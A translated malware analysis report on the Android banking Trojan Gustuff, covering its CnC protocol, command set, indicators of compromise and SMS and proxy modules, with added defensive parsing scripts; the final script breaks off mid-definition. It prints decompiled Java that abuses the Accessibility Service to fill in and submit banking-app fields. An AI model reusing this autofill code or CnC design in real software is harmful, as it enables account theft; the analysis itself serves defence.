How the Android Trojan Gustuff skims the cream (fiat and crypto) from your accounts

The other day Group-IB reported on the activity of the Android Trojan Gustuff. It operates exclusively in international markets, attacking customers of the 100 largest foreign banks, users of 32 mobile crypto wallets, and also major e-commerce resources. The developer of Gustuff, however, is a Russian-speaking cybercriminal known by the nickname Bestoffer. Until recently he praised his Trojan as "a serious product for people with knowledge and experience."

Group-IB malicious code analysis specialist Ivan Pisarev, in his research, describes in detail how Gustuff works and what makes it dangerous.

Whom does Gustuff hunt?

Gustuff belongs to a new generation of malware with fully automated functions. According to the developer, the Trojan is a new, improved version of the AndyBot malware, which since November 2017 has been attacking Android phones and stealing money through phishing web forms masquerading as the mobile applications of well-known international banks and payment systems. Bestoffer stated that the rental price of Gustuff Bot was $800 per month.

Analysis of the Gustuff sample showed that the Trojan can potentially target customers using the mobile applications of the largest banks, such as Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, as well as the crypto wallets Bitcoin Wallet, BitPay, Cryptopay, Coinbase, etc.

Originally created as a classic banking Trojan, the current version of Gustuff has significantly expanded its list of potential targets. In addition to the Android applications of banks, fintech companies and crypto services, Gustuff targets users of marketplace applications, online stores, payment systems and instant messengers: in particular PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut and others.

Entry point: counting on mass infection

Gustuff uses the "classic" vector for penetrating Android smartphones: SMS messages with links to APKs. Once an Android device is infected with the Trojan, on command from the server Gustuff can spread further through the contact list of the infected phone or through the server's database. Gustuff's functionality is designed for mass infection and maximum capitalisation of its operators' business: it has a unique "autofill" function for legitimate mobile banking applications and crypto wallets, which allows theft of money to be accelerated and scaled.

Study of the Trojan showed that the autofill function is implemented using the Accessibility Service, a service intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass the protection against interaction with window elements of other applications by using this Android service. However, the use of the Accessibility Service in combination with autofill is still rare.

Once loaded onto the victim's phone, Gustuff, using the Accessibility Service, is able to interact with window elements of other applications (banking, cryptocurrency, as well as online shopping applications, messengers, etc.), performing the actions the attackers need. For example, on command from the server the Trojan can press buttons and change the values of text fields in banking applications. Using the Accessibility Service mechanism allows the Trojan to bypass the security mechanisms banks use against the previous generation of mobile Trojans, as well as the security policy changes Google has implemented in new versions of Android OS. Thus Gustuff "knows how" to disable Google Protect: according to the author, this function works in 70% of cases.


Gustuff can also show fake PUSH notifications carrying the icons of legitimate mobile applications. The user taps the PUSH notification and sees a phishing window loaded from the server, where they enter the requested bank card or crypto wallet data. In another Gustuff scenario, the application in whose name the PUSH notification was shown is opened. In this case the malware, on command from the server and via the Accessibility Service, can fill in the fields of the banking application for a fraudulent transaction.

Gustuff's functionality also includes sending information about the infected device to the server, reading/sending SMS messages, sending USSD requests, launching a SOCKS5 Proxy, following links, sending files (including photos of documents, screenshots, photos) to the server, and resetting the device to factory settings.

Malware analysis

Before installing a malicious application, Android OS shows the user a window with the list of permissions Gustuff requests:

[screenshot: permission request dialog]
The application is installed only after the user's consent. After launch, the Trojan shows the user a window:

[screenshot: window shown after launch]
After that it removes its icon.

Gustuff is packed, according to the author, with a packer from FTT. After launch, the application periodically contacts the CnC server to receive commands. Several of the files we examined used the IP address 88.99.171[.]105 as the control server (hereinafter referred to as <%CnC%>).

After launch, the program starts sending messages to the server http://<%CnC%>/api/v1/get.php.

The response is expected to be JSON of the following format:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

Each time it contacts the server, the application sends information about the infected device. The message format is shown below. It is worth noting that the full, extra, apps and permission fields are optional and are sent only in response to a request command from the CnC.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

Storing configuration data

Gustuff stores important operational data in a preferences file. The file name, as well as the names of the parameters in it, are the result of computing the MD5 sum of the string 15413090667214.6.1<%name%>, where <%name%> is the original name-value. Python interpretation of the generation function:

import hashlib

def nameGenerator(name):
    # MD5 hex digest of the constant prefix concatenated with the parameter name
    return hashlib.md5(("15413090667214.6.1" + name).encode()).hexdigest()

Hereinafter we will denote it as NameGenerator(input).
So the preferences file name is NameGenerator("API_SERVER_LIST"), and it contains values with the following names:

Parameter name - Value
NameGenerator("API_SERVER_LIST") - Contains the list of CnC addresses as an array.
NameGenerator("API_SERVER_URL") - Contains the CnC address.
NameGenerator("SMS_UPLOAD") - The flag is set by default. If the flag is set, SMS messages are sent to the CnC.
NameGenerator("SMS_ROOT_NUMBER") - The phone number to which SMS messages received by the infected device are sent. Empty by default.
NameGenerator("SMS_ROOT_NUMBER_RESEND") - The flag is cleared by default. If set, when the infected device receives an SMS it is forwarded to the root number.
NameGenerator("DEFAULT_APP_SMS") - The flag is cleared by default. If this flag is set, the application processes incoming SMS messages.
NameGenerator("DEFAULT_ADMIN") - The flag is cleared by default. If the flag is set, the application has administrator rights.
NameGenerator("DEFAULT_ACCESSIBILITY") - The flag is cleared by default. If the flag is set, a service using the Accessibility Service is running.
NameGenerator("APPS_CONFIG") - A JSON object containing the list of actions to perform when an Accessibility event associated with a specific application is triggered.
NameGenerator("APPS_INSTALLED") - Stores the list of applications installed on the device.
NameGenerator("IS_FIST_RUN") - The flag is reset on first launch.
NameGenerator("UNIQUE_ID") - Contains a unique identifier. Generated when the bot is launched for the first time.
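For forensic triage the scheme above can be inverted: the hashed file and key names are deterministic, so a shared_prefs file pulled from a device can be mapped back to the parameter names the article lists. This is an added example, not code from the article or from the sample; the XML document it parses is constructed, and the values in it are made up.

```python
import hashlib
import xml.etree.ElementTree as ET

# Constant prefix from the article: NameGenerator(name) = md5("15413090667214.6.1" + name)
PREFIX = "15413090667214.6.1"

# Parameter names the article lists for the preferences file
KNOWN_NAMES = [
    "API_SERVER_LIST", "API_SERVER_URL", "SMS_UPLOAD", "SMS_ROOT_NUMBER",
    "SMS_ROOT_NUMBER_RESEND", "DEFAULT_APP_SMS", "DEFAULT_ADMIN",
    "DEFAULT_ACCESSIBILITY", "APPS_CONFIG", "APPS_INSTALLED", "IS_FIST_RUN",
    "UNIQUE_ID",
]


def name_generator(name: str) -> str:
    """Hashed name exactly as the Trojan derives it (lower-case MD5 hex digest)."""
    return hashlib.md5((PREFIX + name).encode("utf-8")).hexdigest()


def build_lookup(names=KNOWN_NAMES) -> dict:
    """Reverse table: hashed name -> plaintext parameter name."""
    return {name_generator(n): n for n in names}


def is_gustuff_prefs_file(filename: str, names=KNOWN_NAMES) -> bool:
    """True when a shared_prefs file is named after a known parameter, e.g.
    NameGenerator("API_SERVER_LIST").xml, the file name the article gives."""
    stem = filename[:-4] if filename.endswith(".xml") else filename
    return stem in build_lookup(names)


def resolve_shared_prefs(xml_text: str, names=KNOWN_NAMES) -> dict:
    """Parse an Android shared_prefs XML document and return
    {plaintext_name: value} for every entry whose key matches the scheme."""
    lookup = build_lookup(names)
    resolved = {}
    for elem in ET.fromstring(xml_text):   # children of <map>: <string>, <boolean>, ...
        key = elem.get("name")
        if key not in lookup:
            continue
        # <boolean>/<int>/<long> carry the value in "value"; <string> carries it as text
        value = elem.get("value") if elem.get("value") is not None else (elem.text or "")
        resolved[lookup[key]] = value
    return resolved


# Constructed sample: two hashed keys and one unrelated key (values are made up;
# only the key derivation follows the article).
SAMPLE_PREFS = f"""<map>
    <string name="{name_generator("API_SERVER_URL")}">http://cnc.example/api/v1/</string>
    <boolean name="{name_generator("DEFAULT_ACCESSIBILITY")}" value="true" />
    <string name="theme">dark</string>
</map>"""

if __name__ == "__main__":
    print(resolve_shared_prefs(SAMPLE_PREFS))
```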

Server command processing module

The application stores the addresses of the CnC servers as an array of Base85-encoded strings. The list of CnC servers can be changed when the corresponding command is received, in which case the addresses are saved to the preferences file.

In response to a request, the server sends the application a command. It is worth noting that commands and parameters are presented in JSON format. The application can process the following commands:

Command - Description
forwardStart - Start sending the SMS messages received by the infected device to the CnC server.
forwardStop - Stop sending the SMS messages received by the infected device to the CnC server.
ussdRun - Execute a USSD request. The number to which the USSD request is made is in the JSON field "number".
sendSms - Send one SMS message (if necessary, the message is "split" into parts). As a parameter the command takes a JSON object consisting of the fields "to" (destination number) and "body" (message body).
sendSmsAb - Send SMS messages (split into parts if necessary) to everyone in the infected device's contact list. The interval between messages is 10 seconds. The message body is in the JSON field "body".
sendSmsMass - Send SMS messages (split into parts if necessary) to the contacts specified in the command parameters. The interval between messages is 10 seconds. As a parameter the command takes a JSON array (the "sms" field) whose elements consist of the fields "to" (destination number) and "body" (message body).
changeServer - This command can take as a parameter a value with the key "url", in which case the bot changes the value of NameGenerator("SERVER_URL"), or "array", in which case the bot writes the array to NameGenerator("API_SERVER_LIST"). In this way the application changes the address of the CnC servers.
adminNumber - The command is intended for working with the root number. It accepts a JSON object with the following parameters: "number" (replace the value of NameGenerator("ROOT_NUMBER") with the received value), "resend", and the unique identifier.
updateInfo - Send information about the infected device to the server.
wipeData - The command is intended to delete user data. Depending on the name under which the application was launched, either the data is completely deleted together with a reboot of the device (primary user), or only the user data is deleted (secondary user).
socksStart - Start the proxy module. The module's operation is described in a separate section.
socksStop - Stop the proxy module.
openLink - Follow a link. The link is in the JSON parameter under the key "url". "android.intent.action.VIEW" is used to open the link.
uploadAllSms - Send all SMS messages received by the device to the server.
uploadAllPhotos - Send images from the infected device to a URL. The URL comes as a parameter.
uploadFile - Send a file from the infected device to a URL. The URL comes as a parameter.
uploadPhoneNumbers - Send the phone numbers from the contact list to the server. If a JSON object with the key "ab" is passed as a parameter, the application takes the contact list from the phone book. If a JSON object with the key "sms" is passed, the application reads the contact list from the senders of SMS messages.
changeArchive - The application downloads a file from the address passed as a parameter under the key "url". The downloaded file is saved under the name "archive.zip". The application then unpacks the file, optionally using the archive password "b5jXh37gxgHBrZhQ4j3D". The unpacked files are saved in the [external storage]/hgps directory. In this directory the application stores its web fakes (described below).
actions - The command is intended for working with the Action Service, which is described in a separate section.
test - Does nothing.
download - The command is intended to download a file from a remote server and save it to the "Downloads" directory. The URL and file name come as parameters, as fields of the JSON parameter object: "url" and "fileName" respectively.
remove - Removes a file from the "Downloads" directory. The file name comes in a JSON parameter with the key "fileName". The default file name is "tmp.apk".
notification - Show a notification whose description and title texts are defined by the control server.

Format of the notification command:

{
    "results" : "OK",
    "command":{
        "id": <%id%>,
        "command":"notification",
        "timestamp":<%Server Timestamp%>,
        "params":{
            "openApp":<%Open original app or not%>,
            "array":[
                {"title":<%Title text%>,
                 "desc":<%Description text%>,
                 "app":<%Application name%>}
            ]
        },
    },
}

The notification shown by the analysed file looks identical to notifications generated by the application specified in the app field. If the value of the openApp field is True, when the notification is opened the application specified in the app field is launched. If the value of openApp is False, then:

  • A phishing window opens whose contents are loaded from the directory <%external storage%>/hgps/<%filename%>
  • A phishing window opens whose contents are loaded from the server <%url%>?id=<%Bot id%>&app=<%Application name%>
  • A phishing window opens that imitates a Google Play card, with the option to enter card details.

The application sends the result of executing any command to <%CnC%>set_state.php as a JSON object of the following format:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

Action Service
The list of commands the application processes includes actions. When such a command is received, the command processing module turns to this service to execute the extended command. The service accepts a JSON object as a parameter. The service can execute the following commands:

1. PARAMS_ACTION - on receiving this command, the service first takes from the JSON parameter the value of the key type, which can be one of the following:

  • serviceInfo - the subcommand takes from the JSON parameter the value of the key includeNotImportant. If the flag is true, the application sets the FLAG_ISOLATED_PROCESS flag on the service that uses the Accessibility Service. In this way the service is started in a separate process.
  • root - get and send to the server information about the currently focused window. The application obtains the information using the AccessibilityNodeInfo class.
  • admin - request administrator rights.
  • delay - suspend the Action Service for the number of milliseconds specified in the parameter with the key "data".
  • windows - send the list of windows visible to the user.
  • install - install an application on the infected device. The package name of the archive is in the key "fileName". The archive itself is in the Downloads directory.
  • global - the subcommand is intended to go from the current window to:
    • the Quick Settings menu
    • back
    • home
    • notifications
    • the recently opened applications window

  • launch - launch an application. The application name comes as a parameter with the key data.
  • sounds - switch the sound mode to silent.
  • unlock - turns on the backlight of the screen and keyboard at full brightness. The application performs this action using a WakeLock, specifying the string [Application Label]:INFO as the tag.
  • permissionOverlay - the function is not implemented (the response to the command is {"message":"Not supported"} or {"message":"low sdk"})
  • gesture - the function is not implemented (the response to the command is {"message":"Not supported"} or {"message":"Low API"})
  • permissions - this command is meant to request permissions for the application. However, the request function is not implemented, so the command is meaningless. The list of requested rights comes as a JSON array with the key "permissions". The default list:
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_CONTACTS
    • android.permission.CALL_PHONE
    • android.permission.RECEIVE_SMS
    • android.permission.SEND_SMS
    • android.permission.READ_SMS
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • open - show a phishing window. Depending on the parameter coming from the server, the application can show the following phishing windows:
    • Show a phishing window whose contents are stored in a file in the directory <%external directory%>/hgps/<%param_filename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • Show a phishing window whose contents are first loaded from the address <%url_param%>?id=<%bot_id%>&app=<%packagename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • Show a phishing window imitating a Google Play card

  • interactive - the command is intended for interacting with window elements of other applications using the Accessibility Service. A dedicated service is implemented in the program for this interaction. The analysed application can interact with windows that are:
    • Currently active. In this case the parameter contains the id or the text (name) of the object to interact with.
    • Visible to the user at the moment the command is executed. The application selects windows by id.

    Having obtained the AccessibilityNodeInfo objects for the window elements of interest, the application, depending on the parameters, can perform the following actions:

    • focus - set focus on the object.
    • click - click the object.
    • actionId - perform an action by id.
    • setText - change the text of the object. The text can be changed in two ways: by performing the ACTION_SET_TEXT action (if the Android version on the infected device is Lollipop or newer), or by placing the string on the clipboard and pasting it into the object (older versions). The command can be used to change the data in a banking application.

2. PARAMS_ACTIONS - the same as PARAMS_ACTION, except that a JSON array of commands arrives.

Many readers will probably be interested in what the function for interacting with the window elements of another application looks like. This is how that functionality is implemented in Gustuff:

// Decompiled from the sample. The raw decompiler output declared "count" twice;
// the repeat counter is named "repeat" here so the snippet compiles.
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int repeat = action.optInt("repeat", 1);    // how many times to apply the action (default 1)
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;                               // number of successfully performed actions
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();      // AccessibilityNodeInfo of a matched window element
        if(1 <= repeat) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    // 1 == AccessibilityNodeInfo.ACTION_FOCUS
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    // 16 == AccessibilityNodeInfo.ACTION_CLICK
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    // arbitrary action id supplied by the server
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == repeat) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addProperty("res", Integer.valueOf(count));   // report the success count back to the CnC
    return count > 0;   // the decompiled snippet lacked a return; assumed: "at least one action succeeded"
}

The text substitution function:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build.VERSION.SDK_INT >= 21) {   // Lollipop and newer: ACTION_SET_TEXT is available
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        // older versions: put the text on the clipboard and paste it into the element
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
            ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
            result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

Thus, with a correctly configured control server, Gustuff is able to fill in the text fields of a banking application and press the buttons needed to complete a transaction. The Trojan does not even need to log into the application: it is enough to send a command to show a PUSH notification and then open the already installed banking application. The user authenticates, after which Gustuff can autofill.

SMS message processing module

The application registers an event handler on the infected device to receive SMS messages. The application under study can receive commands from the operator in the body of an SMS message. The commands come in the format:

7!5=<%Base64 encoded command%>

The application searches all incoming SMS messages for the string 7!5=; when the string is found, it decodes the Base64 string at offset 4 and executes the command. The commands are the same as those of the CnC. The result of execution is sent to the same number the command came from. Response format:

7*5=<%Base64 encoding of "result_code command"%>

Optionally, the application can send all received messages to the root number. For this, the root number must be specified in the preferences file and the message forwarding flag must be set. The SMS message is sent to the attacker's number in the format:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

Also optionally, the application can send messages to the CnC. The SMS message is sent to the server in JSON format:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

If the NameGenerator("DEFAULT_APP_SMS") flag is set, the application stops processing the SMS message and clears the list of incoming messages.
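The three SMS formats described above (the 7!5= command, the 7*5= reply and the message forwarded to the root number) can be recognised in an SMS dump taken from a device. The triage script below is an added example, not code from the article; it assumes that the Base64 payload of a command is the same JSON the CnC uses (the article only says the commands are the same), and every message in it is constructed.

```python
import base64
import binascii
import json
import re

CMD_MARKER = "7!5="    # inbound operator command
REPLY_MARKER = "7*5="  # the bot's reply to the sender

# <%From number%> - <%dd/MM/yyyy HH:mm:ss%> <%SMS body%> (forwarding format from the article)
FORWARD_RE = re.compile(
    r"^(?P<sender>\S+) - (?P<time>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}) (?P<body>.*)$", re.S)


def _decode_after(marker: str, text: str):
    """Base64-decode the token that follows `marker` in `text`; None if absent/invalid."""
    pos = text.find(marker)
    if pos < 0:
        return None
    rest = text[pos + len(marker):].split()
    if not rest:
        return None
    try:
        return base64.b64decode(rest[0], validate=True)
    except (binascii.Error, ValueError):
        return None


def decode_sms_command(body: str):
    """Decode a '7!5=' command. JSON is tried first (assumption: SMS commands carry the
    same JSON as the CnC), falling back to the raw text."""
    raw = _decode_after(CMD_MARKER, body)
    if raw is None:
        return None
    text = raw.decode("utf-8", errors="replace")
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        return text


def decode_sms_reply(body: str):
    """Decode a '7*5=' reply into (result_code, command)."""
    raw = _decode_after(REPLY_MARKER, body)
    if raw is None:
        return None
    code, _, command = raw.decode("utf-8", errors="replace").partition(" ")
    return code, command


def parse_forwarded(body: str):
    """Split an SMS forwarded to the root number into sender, time and body, or None."""
    m = FORWARD_RE.match(body)
    return m.groupdict() if m else None


def triage(messages):
    """Classify SMS records {'from': ..., 'body': ...}; return (direction, decoded) tuples."""
    out = []
    for msg in messages:
        if (cmd := decode_sms_command(msg["body"])) is not None:
            out.append(("operator->bot", cmd))
        elif (rep := decode_sms_reply(msg["body"])) is not None:
            out.append(("bot->operator", rep))
        elif (fwd := parse_forwarded(msg["body"])) is not None:
            out.append(("bot->root-number", fwd))
    return out


def b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample dump (numbers and contents are made up)
SAMPLE_SMS = [
    {"from": "+15550001111", "body": "7!5=" + b64('{"command":"updateInfo","params":{}}')},
    {"from": "+15550002222", "body": "7*5=" + b64("0 updateInfo")},
    {"from": "+15550002222", "body": "+15550003333 - 28/03/2019 14:05:09 Your code is 1234"},
    {"from": "+15550004444", "body": "Lunch at 12?"},
]

if __name__ == "__main__":
    for direction, decoded in triage(SAMPLE_SMS):
        print(direction, decoded)
```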

Proxy module

The application under study contains a "Backconnect Proxy" module (hereinafter the proxy module), which has a separate class containing static fields with the configuration. The configuration data is stored in the sample in clear text:

[screenshot: proxy configuration class]

All actions performed by the proxy module are logged to files. For this, the application creates a directory named "logs" in External Storage (the ProxyConfigClass.logsDir field of the configuration class), in which the log files are stored. Logging goes to files with the following names:

  1. main.txt - the work of the class named CommandServer is logged to this file. Hereinafter, logging the string str to this file is denoted mainLog(str).
  2. session-<%id%>.txt - this file stores log data related to a specific proxy session. Hereinafter, logging the string str to this file is denoted sessionLog(str).
  3. server.txt - this file receives all the data written to the files above.

Log record format:

<%Date%> [Thread[<%thread id%>], id[]]: log-string

Exceptions occurring during operation of the proxy module are also logged to a file. For this, the application builds a JSON object of the following format:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

It then converts it to its string representation and logs it.

The proxy module is started after the corresponding command is received. When the command to start the proxy module arrives, the application starts a service called MainService, which is responsible for managing the proxy module: starting and stopping it.

Service start stages:

1. Starts a timer that periodically checks whether the proxy module is active. If the module is not active, it starts it. The proxy module is also started when the android.net.conn.CONNECTIVITY_CHANGE event fires.

2. The application creates a wake lock with the PARTIAL_WAKE_LOCK parameter and acquires it. This prevents the device's CPU from entering sleep mode.

3. Starts the command processing class of the proxy module, first logging the line mainLog("start server") and

Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

where proxy_cnc, command_port and proxy_port are parameters taken from the proxy server configuration.

The command processing class is called CommandConnection. Immediately after starting, it performs the following actions:

4. Connects to ProxyConfigClass.host:ProxyConfigClass.commandPort and sends information about the infected device in JSON format:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Where:

  • id - identifier; the module tries to get its value from the "id" field of the Shared Preferences file named "x". If the value cannot be obtained, it generates a new one. Thus the proxy module has its own identifier, generated in the same way as the Bot ID.
  • imei - the device's IMEI. If an error occurs while obtaining the value, an error message text is written in this field instead.
  • imsi - the device's International Mobile Subscriber Identity. If an error occurs while obtaining the value, an error message text is written in this field instead.
  • model - the end-user-visible name of the end product.
  • manufacturer - the manufacturer of the product/hardware (Build.MANUFACTURER).
  • androidVersion - a string formatted as "<%release_version%> (<%os_version%>),<%sdk_version%>"
  • country - the device's current locale.
  • partnerId - an empty string.
  • packageName - the package name.
  • networkType - the type of the current network connection (for example "WIFI", "MOBILE"). In case of an error, null.
  • hasGsmSupport - true if the phone supports GSM, otherwise false.
  • simReady - the state of the SIM card.
  • simCountry - ISO country code (based on the SIM card provider).
  • networkOperator - the operator name. If an error occurs while obtaining the value, an error message text is written in this field instead.
  • simOperator - the Service Provider Name (SPN). If an error occurs while obtaining the value, an error message text is written in this field instead.
  • version - this field is stored in the config class; in the bot versions examined it equals "1.6".

5. Switches to waiting for commands from the server. Commands from the server arrive in the format:

  • offset 0 - command
  • offset 1 - sessionId
  • offset 2 - length
  • offset 4 - data

When a command arrives, the application logs it via mainLog.

The following commands from the server are possible:

Command (code) - Data - Description
connectionId (0) - connection ID - create a new connection
SLEEP (3) - time - stop the proxy module
PING_PONG (4) - none - send a PONG message

The PONG message consists of 4 bytes and looks like this: 0x04000000.
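The framing above is simple enough to parse from a packet capture of the proxy control channel, and doing so shows that the 4-byte PONG is itself a PING_PONG frame (command 4, sessionId 0, length 0). The parser below is an added example, not code from the article; the article only places data at offset 4, so the length is assumed to be a 16-bit little-endian field, and the sample stream is constructed.

```python
import struct

# Command codes the article lists for the proxy control channel
COMMANDS = {0: "connectionId", 3: "SLEEP", 4: "PING_PONG"}
HEADER_LEN = 4  # offset 0: command, 1: sessionId, 2: length, 4: data
# Data starts at offset 4, so length occupies offsets 2-3; its byte order is an
# assumption (little-endian here; swap to ">H" if a capture shows otherwise).
LENGTH_FMT = "<H"

# The 4-byte PONG from the article; under the same header layout it is
# command 4, sessionId 0, length 0: a PING_PONG frame carrying no data.
PONG = bytes.fromhex("04000000")


def build_frame(command: int, session_id: int, data: bytes = b"") -> bytes:
    """Encode one frame (used here only to construct test traffic)."""
    return bytes([command, session_id]) + struct.pack(LENGTH_FMT, len(data)) + data


def parse_frames(stream: bytes):
    """Split a captured byte stream into frames.
    Returns (frames, tail) where tail is an incomplete trailing frame, if any."""
    frames, pos = [], 0
    while pos + HEADER_LEN <= len(stream):
        command, session_id = stream[pos], stream[pos + 1]
        (length,) = struct.unpack_from(LENGTH_FMT, stream, pos + 2)
        end = pos + HEADER_LEN + length
        if end > len(stream):
            break  # wait for the rest of this frame
        frames.append({
            "code": command,
            "command": COMMANDS.get(command, "unknown"),
            "sessionId": session_id,
            "data": stream[pos + HEADER_LEN:end],
        })
        pos = end
    return frames, stream[pos:]


def describe(frame: dict) -> str:
    """One-line description for an analyst's timeline."""
    name = frame["command"]
    if name == "connectionId":
        return f"new connection, session {frame['sessionId']}, id bytes {frame['data'].hex()}"
    if name == "SLEEP":
        return f"stop proxy module, time bytes {frame['data'].hex()}"
    if name == "PING_PONG":
        return "keep-alive; bot answers with PONG " + PONG.hex()
    return f"unknown command {frame['code']} with {len(frame['data'])} data bytes"


# Constructed sample capture: connection request, sleep, ping, then a truncated frame
SAMPLE_STREAM = (build_frame(0, 1, b"\x2a")
                 + build_frame(3, 0, b"\x3c\x00\x00\x00")
                 + PONG
                 + build_frame(0, 2, b"\x07")[:-1])

if __name__ == "__main__":
    frames, tail = parse_frames(SAMPLE_STREAM)
    for f in frames:
        print(describe(f))
    print("unparsed tail:", tail.hex())
```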

When the connectionId command is received (to create a new connection), CommandConnection creates an instance of the ProxyConnection class.

  • Two classes take part in proxying: ProxyConnection and end. When the ProxyConnection class is created, it connects to the address ProxyConfigClass.host:ProxyConfigClass.proxyPort and passes the JSON object:

 {
    "id":<%connectionId%>
}

In response, the server sends a SOCKS5 message containing the address of the remote server with which a connection must be established. Interaction with that server takes place inside the end class. The connection setup can be represented schematically as follows:

[diagram: proxy connection setup]

Network interaction

To protect against traffic analysis by network sniffers, the interaction between the CnC server and the application can be protected using the SSL protocol. All data transmitted to and from the server is presented in JSON format. During operation the application makes the following requests:

  • http://<%CnC%>/api/v1/set_state.php - the result of command execution.
  • http://<%CnC%>/api/v1/get.php - receiving a command.
  • http://<%CnC%>/api/v1/load_sms.php - uploading SMS messages from the infected device.
  • http://<%CnC%>/api/v1/load_ab.php - uploading the contact list from the infected device.
  • http://<%CnC%>/api/v1/aevents.php - the request is made when parameters in the preferences file are updated.
  • http://<%CnC%>/api/v1/set_card.php - uploading data obtained through the phishing window imitating the Google Play Market.
  • http://<%CnC%>/api/v1/logs.php - uploading log data.
  • http://<%CnC%>/api/v1/records.php - uploading data obtained through phishing windows.
  • http://<%CnC%>/api/v1/set_error.php - reporting an error that occurred.
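Since the article states that the CnC traffic may run over SSL, the endpoint list is most useful against logs from a forward proxy or TLS-inspecting gateway that record full URLs. The detection below is an added example, not code from the article: a single hit on /api/v1/get.php is a weak signal, so it flags a client only when it touches several distinct endpoints on the same server. The log format and every address in the sample are constructed.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Endpoints the article lists under http://<%CnC%>/api/v1/
GUSTUFF_ENDPOINTS = {
    "get.php": "command poll",
    "set_state.php": "command result",
    "load_sms.php": "SMS upload",
    "load_ab.php": "contact list upload",
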